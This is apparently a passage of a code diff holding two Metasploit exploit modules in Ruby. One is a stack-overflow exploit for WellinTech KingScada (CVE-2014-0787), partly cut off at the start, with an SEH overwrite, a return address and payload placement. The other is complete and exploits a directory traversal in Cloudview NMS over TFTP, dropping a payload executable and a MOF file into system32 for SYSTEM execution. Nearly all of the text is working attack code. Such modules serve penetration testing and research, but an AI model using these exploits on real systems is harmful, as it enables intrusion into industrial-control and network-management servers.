for a memcpy operation which leads to an overflown stack buffer
},
'Author' => [ 'James Fitts' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2014-0787' ],
[ 'ZDI', '14-071' ],
[ 'URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-14-098-02' ]
],
'Privileged' => false,
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00\x0a\x0d\x20",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows XP SP3 EN / WellinTech KingScada 31.1.1.4',
{
# dbghelp.dll
# pop esi/ pop edi/ retn
'ret' => 0x02881fbf,
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Apr 10, 2014'))
register_options([Opt::RPORT(12401)], self.class)
end
def exploit
connect
p = payload.encoded
buf = make_nops(5000)
buf[0, 4] = [0x000004d2].pack('V')
buf[4, 4] = [0x0000007b].pack('V')
buf[8, 4] = [0x0000133c].pack('V') # size for memcpy()
buf[1128, p.length] = p
buf[2128, 8] = generate_seh_record(target['ret'])
buf[2136, 5] = "\xe9\x4b\xfb\xff\xff" # jmp $-1200
print_status("Trying target #{target.name}...")
sock.put(buf)
handler
disconnect
end
end

View file

@ -0,0 +1,88 @@
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Rex::Proto::TFTP
include Msf::Exploit::EXE
include Msf::Exploit::WbemExec
def initialize(info={})
super(update_info(info,
'Name' => "Cloudview NMS 2.00b Writable Directory Traversal Execution",
'Description' => %q{
This module exploits a vulnerability found in Cloudview NMS server. The
software contains a directory traversal vulnerability that allows a remote
attacker to write arbitrary file to the file system, which results in
code execution under the context 'SYSTEM'.
},
'License' => MSF_LICENSE,
'Author' => [ 'james fitts' ],
'References' =>
[
['URL', '0day']
],
'Payload' =>
{
'BadChars' => "\x00",
},
'DefaultOptions' =>
{
'ExitFunction' => "none"
},
'Platform' => 'win',
'Targets' =>
[
[ ' Cloudview NMS 2.00b on Windows', {} ]
],
'Privileged' => false,
'DisclosureDate' => "Oct 13 2014",
'DefaultTarget' => 0))
register_options([
OptInt.new('DEPTH', [ false, "Levels to reach base directory", 5 ]),
OptAddress.new('RHOST', [ true, "The remote TFTP server address" ]),
OptPort.new('RPORT', [ true, "The remote TFTP server port", 69 ])
], self.class)
end
def upload(filename, data)
tftp_client = Rex::Proto::TFTP::Client.new(
"LocalHost" => "0.0.0.0",
"LocalPort" => 1025 + rand(0xffff-1025),
"PeerHost" => datastore['RHOST'],
"PeerPort" => datastore['RPORT'],
"LocalFile" => "DATA:#{data}",
"RemoteFile" => filename,
"Mode" => "octet",
"Context" => {'Msf' => self.framework, "MsfExploit" => self },
"Action" => :upload
)
ret = tftp_client.send_write_request { |msg| print_status(msg) }
while not tftp_client.complete
select(nil, nil, nil, 1)
tftp_client.stop
end
end
def exploit
peer = "#{datastore['RHOST']}:#{datastore['RPORT']}"
exe_name = rand_text_alpha(rand(10)+5) + '.exe'
exe = generate_payload_exe
mof_name = rand_text_alpha(rand(10)+5) + '.mof'
mof = generate_mof(mof_name, exe_name)
depth = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH']
levels = "../" * depth
print_status("#{peer} - Uploading executable (#{exe.length.to_s} bytes)")
upload("#{levels}WINDOWS\\system32\\#{exe_name}", exe)
select(nil, nil, nil, 1)
print_status("#{peer} - Uploading .mof...")
upload("#{levels}WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof)
end
end